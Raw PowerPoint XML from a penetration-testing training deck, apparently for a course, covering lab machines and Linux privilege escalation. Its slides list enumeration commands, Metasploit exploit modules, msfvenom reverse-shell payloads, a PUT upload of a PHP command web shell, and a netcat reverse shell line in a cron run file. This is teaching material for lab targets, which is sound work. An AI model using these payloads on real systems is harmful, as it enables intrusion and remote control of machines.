              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -h 192.168.1.X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1243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29159"/>
            <a:ext cx="355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/>
              <a:t>CronTab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> - Box2 - Part 2 Exploitation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1697814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Connect to remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>mysql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mysql -h 192.168.1.X -u root -p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545" y="2505728"/>
            <a:ext cx="11888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Enumerate database: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show databases;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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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show tables;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select * from users;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4144639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Connect to remote host with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ssh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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mistic@192.168.1.92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60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337848" y="1826279"/>
            <a:ext cx="6985261" cy="23876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Linux Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1266942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29159"/>
            <a:ext cx="4022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/>
              <a:t>CronTab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> - Box2 - Part 3 Post Exploitation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1697814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Enumerate crontab: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cat /etc/crontab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545" y="2505728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Create Bash reverse shell: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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=192.168.1.X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4444 R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235326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29159"/>
            <a:ext cx="4293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Sensitive Files – Box3 - Part 1 Enumeration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2890877"/>
            <a:ext cx="11888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Enumeration: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nmap -sP 192.168.1.1-100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nmap -p- -A 192.168.1.X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nikto -h 192.168.1.X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dirbuster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 err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Simple PHP Blog 0.4.0</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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785541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Box Download Link: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https://drive.google.com/file/d/1xDzQcPcUHX7GGQlY8iBt5BYIP_csBO58/view?usp=sharing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86523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29159"/>
            <a:ext cx="4152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Sensitive Files – Box3 - Part 2 Exploitation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1697814"/>
            <a:ext cx="11888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msfconsole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search sphpblog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use exploit/unix/webapp/sphpblog_file_upload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set rhosts 192.168.1.X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dirty="0"/>
              <a:t>set uri /blog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exploit</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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513551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Exploit creds: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 creds for login to the blog system.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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545" y="4436881"/>
            <a:ext cx="11888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Php Reverse Shell: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cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php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edit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reverse shell with your address for reverse shell using netcat</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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99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29159"/>
            <a:ext cx="4617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Sensitive Files – Box3 - Part 3 Post Exploitation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1697814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Find creds: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cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/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cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli_connect.php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142273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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> for remote login: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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> root@192.168.1.X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141028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29159"/>
            <a:ext cx="4293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Http Methods - Box4 - Part 1 Enumeration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2620911"/>
            <a:ext cx="11888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Enumeration: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n-NO" dirty="0"/>
              <a:t>nmap -sP 192.168.1.1-100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n-NO" dirty="0"/>
              <a:t>nmap -p- -A 192.168.1.X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n-NO" dirty="0"/>
              <a:t>dirbuster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n-NO" dirty="0"/>
              <a:t>nikto -h 192.168.1.X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785541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Box Download Link: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https://drive.google.com/file/d/1UqG9Fm2r9Jr4hUutu0-xaZ2lEMfHiP6l/view?usp=sharing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218934"/>
            <a:ext cx="1188828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Http methods enumeration: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n-NO"/>
              <a:t>curl -v -X OPTIONS http://192.168.1.x/test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2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29159"/>
            <a:ext cx="4113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Http Methods - Box4 - Part 2 Exploitation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874808"/>
            <a:ext cx="1188828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PUT method abuse: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curl -v -X PUT -d '&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> system($_GET["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"]);?&gt;' http://192.168.1.x/test/shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs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45" y="2636808"/>
            <a:ext cx="1188828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Creating Reverse shell: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err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>lhost=192.168.1.x lport=443 -f raw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs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45" y="3398808"/>
            <a:ext cx="118882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Creating Listener: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 exploit/multi/handler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payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.1.x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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 443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exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14632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29159"/>
            <a:ext cx="4578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Http Methods - Box4 - Part 3 Post Exploitation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874808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Enumerate crontab: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cat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crontab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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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cron.daily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118064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Finding chkrootkit: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chkrootkit -V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3973574"/>
            <a:ext cx="11888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Privilege Escalation with chkrootkit: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use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/local/chkrootkit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session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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 8080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exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303700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29159"/>
            <a:ext cx="1508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Exame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> – Box5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874808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Box5 Link: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https://drive.google.com/file/d/1BgMPl3yiSd4V4Lo-pIPdLZj1Uc6qRQ2z/view?usp=sharing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1856" y="3068797"/>
            <a:ext cx="11888288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BR" b="1" dirty="0"/>
              <a:t>Objetivos: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Encontre uma maneira de invadir e ter acesso total à máquina.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Obtenha acesso root.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Escreva um relatório detalhado sobre o fluxo de ataque com imagens e comandos usados.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Envie o relatório para rosenberg@itscyber.com.br com o título -&gt; Box5 - relatório feito por [Nome completo]</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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O relatório deve estar no formato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Docx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> ou PDF.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73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82804" y="467920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2804" y="1997624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Verifique a versão do sistema operacional.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4744" y="1180191"/>
            <a:ext cx="2910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Procurando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>coisas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>básicas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2804" y="2418148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Pode haver vulnerabilidade do kernel.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2804" y="2860678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Pode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> haver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulnerabilidade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>versão</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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2804" y="3287854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Verifique os usuários disponíveis e os privilégios de usuário atuais.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2804" y="3658055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Busque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>arquivos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ocultos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267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Find Kernel Version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uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -a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2748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Looking For The Basic Stuff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2932405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Find System Version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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/issue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545" y="3755365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Find System Version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lsb_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -a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545" y="4593359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User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>inforamation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545" y="5431353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Group information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groups %username%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263981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Enumerate usernames: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cat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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> | cut -d: -f1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2748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Looking For The Basic Stuff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2932405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List the allowed (and forbidden) commands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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -l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545" y="3755365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Enumerate super users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awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -F: '($3 == "0") {print}' /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd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3545" y="4593359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View hidden files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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ahl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10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Exploit link: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https://www.exploit-db.com/exploits/8572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2160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Linux Kernel Exploits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2932405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Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>netlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> PID: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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netlink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3545" y="3755365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Complie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> with GCC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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exp.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>poc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3545" y="4593359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Create run file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/>
              <a:t>#!/bin/bash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/>
              <a:t>nc -e /bin/bash 192.168.1.32 4443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98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0049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LinEnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>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https://github.com/rebootuser/LinEnum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2467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Automatic Enumeration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2932405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Linprivchecker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110990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21920" y="2562291"/>
            <a:ext cx="11888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FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rwx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SUID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023360" y="3753395"/>
            <a:ext cx="0" cy="801188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769428" y="3751938"/>
            <a:ext cx="0" cy="801188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524205" y="3759190"/>
            <a:ext cx="0" cy="80118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73182" y="4492059"/>
            <a:ext cx="13003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C000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>USER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45613" y="4522437"/>
            <a:ext cx="17490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GROUP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94618" y="4522437"/>
            <a:ext cx="16353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OTHER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84838" y="2300681"/>
            <a:ext cx="2674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Full Permissions:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196491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/>
      <p:bldP spid="13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Linux Privilege Escalation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45" y="1111741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SUID - Set User ID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200494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/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>é um tipo de permissão que permite aos usuários executar um arquivo com as permissões de um usuário especificado.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3545" y="2651273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err="1"/>
              <a:t>Permissões</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rodam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>privilégios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>elevados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501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56E03BE3544194A9711D8E727977D0B" ma:contentTypeVersion="9" ma:contentTypeDescription="Crie um novo documento." ma:contentTypeScope="" ma:versionID="22ff5d0a66fe176ebb507ab62aa1c3de">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="0de1bb88-64f6-4f17-8933-73fd235044ff" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a8df32aad410ccae5763d30ffd13a2a2" ns2:_="">
    <xsd:import namespace="0de1bb88-64f6-4f17-8933-73fd235044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e1bb88-64f6-4f17-8933-73fd235044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BAF1EF-13A7-4939-BA8C-0E37F954300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DA718A1-6699-4FA3-9A3A-67DB432955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1B2E82-D389-4CE0-9D6D-E84009252D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e1bb88-64f6-4f17-8933-73fd235044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24502</TotalTime>
  <Words>1472</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>232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1_Office Theme</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>Personalizar design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation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  <vt:lpstr>Linux Privilege Escalation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Exploits And Metasploit</dc:title>
  <dc:creator>shai</dc:creator>
  <cp:lastModifiedBy>Yehda Rosenberg</cp:lastModifiedBy>
  <cp:revision>72</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-26T08:36:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-13T08:02:53Z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0x010100D56E03BE3544194A9711D8E727977D0B</vt:lpwstr>
  </property>
</Properties>
</file>